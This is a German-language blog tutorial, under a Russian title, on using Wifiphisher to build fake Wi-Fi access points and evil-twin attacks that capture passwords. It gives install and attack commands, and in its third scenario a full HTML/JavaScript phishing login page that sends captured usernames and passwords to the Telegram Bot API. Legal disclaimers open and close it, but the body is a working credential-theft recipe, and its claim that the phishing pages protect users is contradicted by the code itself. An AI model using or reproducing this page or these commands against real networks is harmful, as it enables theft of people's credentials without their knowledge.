взлом wi-fi

Erstellung eines gefälschten Wi-Fi-Netzwerks zum Abfangen von Passwörtern

Wir erinnern uns – das Gesetz ist alles, und die Einhaltung gesetzlicher Vorgaben ist notwendig. Das bedeutet, dass alles, was unten beschrieben wird, nur für Testzwecke gedacht ist und nur mit Erlaubnis des Netzwerkeigentümers durchgeführt werden darf. Also los!

Jeden Tag tauchen neue Methoden zum Hacken von Wi-Fi-Netzwerken auf, was die Besitzer dazu zwingt, mehr Wert auf Sicherheit zu legen. Ein Tool, das hilft, die Schwachstellen Ihres Wi-Fi-Netzwerks zu überprüfen, ist Wifiphisher.

Wifiphisher – Was ist das?

Wifiphisher ist eine leistungsstarke Open-Source-Bibliothek, die für die Sicherheitsprüfung von Wi-Fi-Netzwerken durch Social-Engineering-Angriffe entwickelt wurde. Lassen Sie uns verstehen, wie dieses Tool funktioniert, welche Szenarien es unterstützt und wie es verwendet werden kann.

Hauptfunktionen von Wifiphisher

  • Erstellung von gefälschten Zugangspunkten (Fake AP):
    Wifiphisher kann gefälschte Wi-Fi-Netzwerke erstellen, die echte imitieren. Dies hilft zu überprüfen, wie geneigt Benutzer sind, sich mit unsicheren Netzwerken zu verbinden.
  • Evil-Twin-Angriff:
    Das Tool trennt Benutzer von ihrem aktuellen Wi-Fi-Netzwerk und leitet sie zu einem gefälschten Zugangspunkt weiter, wo der Angreifer Daten sammeln kann.
  • Phishing-Seiten:
    Wifiphisher bietet die Möglichkeit, gefälschte Login-Seiten einzurichten, um sicherzustellen, dass Benutzer ihre Passwörter nicht auf unsicheren Ressourcen eingeben.
  • Flexibilität in der Konfiguration:
    Die Bibliothek unterstützt verschiedene Angriffsmuster und Szenarien, die an spezifische Bedürfnisse angepasst werden können.

Wie installiert man Wifiphisher?

Die Installation von Wifiphisher ist relativ einfach, aber wichtig zu beachten: Das Tool funktioniert nur unter Linux. Hier sind die grundlegenden Schritte:

  • Stellen Sie sicher, dass Python 3 und der Paketmanager pip auf Ihrem Gerät installiert sind.
  • Klonen Sie das Wifiphisher-Repository von GitHub:
    git clone https://github.com/wifiphisher/wifiphisher.git
  • Wechseln Sie in den Projektordner und installieren Sie die Abhängigkeiten:
    cd wifiphisher
    sudo python3 setup.py install
  • Starten Sie das Tool:
    sudo wifiphisher

Anwendungsbeispiele von Wifiphisher

Szenario 1: Überprüfung der Netzwerksicherheit gegen Evil-Twin-Angriffe

  • Starten Sie Wifiphisher mit dem Schlüssel für den Evil-Twin-Angriff:
    sudo wifiphisher --essid "MyHomeWiFi" --channel 6
  • Benutzer, die mit dem echten Netzwerk verbunden sind, werden getrennt und zu Ihrem gefälschten Zugangspunkt weitergeleitet.
  • Richten Sie eine Phishing-Seite ein, um sicherzustellen, dass Benutzer ihre Daten nicht auf unsicheren Ressourcen eingeben. Zum Beispiel, um eine benutzerdefinierte Login-Seite zu erstellen, verwenden Sie:
    sudo wifiphisher --phishing-page-name "credentials"

Szenario 2: Erstellung eines offenen, gefälschten Zugangspunkts

  • Starten Sie Wifiphisher im Fake-AP-Modus:
    sudo wifiphisher --essid "FreeWiFi" --channel 11
  • Beobachten Sie in Echtzeit, wie viele Benutzer sich mit Ihrem gefälschten Zugangspunkt verbinden, indem Sie die Logs überwachen:
    tail -f /var/log/wifiphisher.log
  • Benötigen Sie eine detailliertere Analyse der gesammelten Daten? Verwenden Sie integrierte Plugins:
    sudo wifiphisher --plugin "plugin_name"

Szenario 3: Abfangen von Daten über eine Phishing-Seite

Zusätzlich zu den integrierten Vorlagen von Wifiphisher können Sie Ihre eigene benutzerdefinierte Seite zum Abfangen von Passwörtern erstellen. Hier ist ein Beispiel für einfachen HTML-Code einer Anmeldeseite, die Anmeldedaten sammelt und an Telegram sendet (eine Anleitung finden Sie hier):

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wi-Fi Login</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
margin-top: 50px;
}
.login-box {
width: 300px;
padding: 40px;
border-radius: 10px;
box-shadow: 0 0 15px rgba(0,0,0,0.2);
background-color: #f1f1f1;
margin: auto;
}
input[type="text"], input[type="password"] {
width: 100%;
padding: 10px;
margin: 10px 0;
border: 1px solid #ddd;
border-radius: 5px;
}
button {
width: 100%;
padding: 10px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<div class="login-box">
<h2>Wi-Fi Login</h2>
<form id="loginForm">
<input type="text" id="username" placeholder="Wi-Fi Username" required>
<input type="password" id="password" placeholder="Wi-Fi Password" required>
<button type="button" onclick="submitForm()">Submit</button>
</form>
</div>
<script>
function submitForm() {
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
// Create a message to send to Telegram
var message = "Captured data:\nUsername: " + username + "\nPassword: " + password;
// Send data to Telegram via API
var botToken = 'YOUR_BOT_TOKEN';  // Replace with your token
var chatId = 'YOUR_CHAT_ID';      // Replace with your chat_id
var url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
// Send data using XMLHttpRequest
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.send();
// Notify that data has been sent
alert('Your data has been sent!');
}
</script>
</body>
</html>

Fazit

Es ist wichtig zu verstehen, dass Wifiphisher nur für ethisches Hacking gedacht ist 🙂 Die Verwendung zur Überprüfung fremder Netzwerke ohne Zustimmung des Eigentümers verstößt gegen das Gesetz. Das Tool wurde entwickelt, um Cybersicherheitsexperten zu helfen, Schwachstellen zu erkennen und potenzielle Angriffe zu verhindern.

Vielen Dank für Ihre Aufmerksamkeit. Wie immer – bei Fragen schreiben Sie bitte an meine E-Mail oder in Telegram.

Support the Blog!

Running a blog takes a lot of effort, time, and passion. Your donations help improve the content, inspire new ideas, and keep the project going.
If you’ve enjoyed the blog’s materials, any support would mean the world to me. Thank you for being here! ❤️

PayPal Logo Donate via PayPal

Revolut Logo Donate via Revolut

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert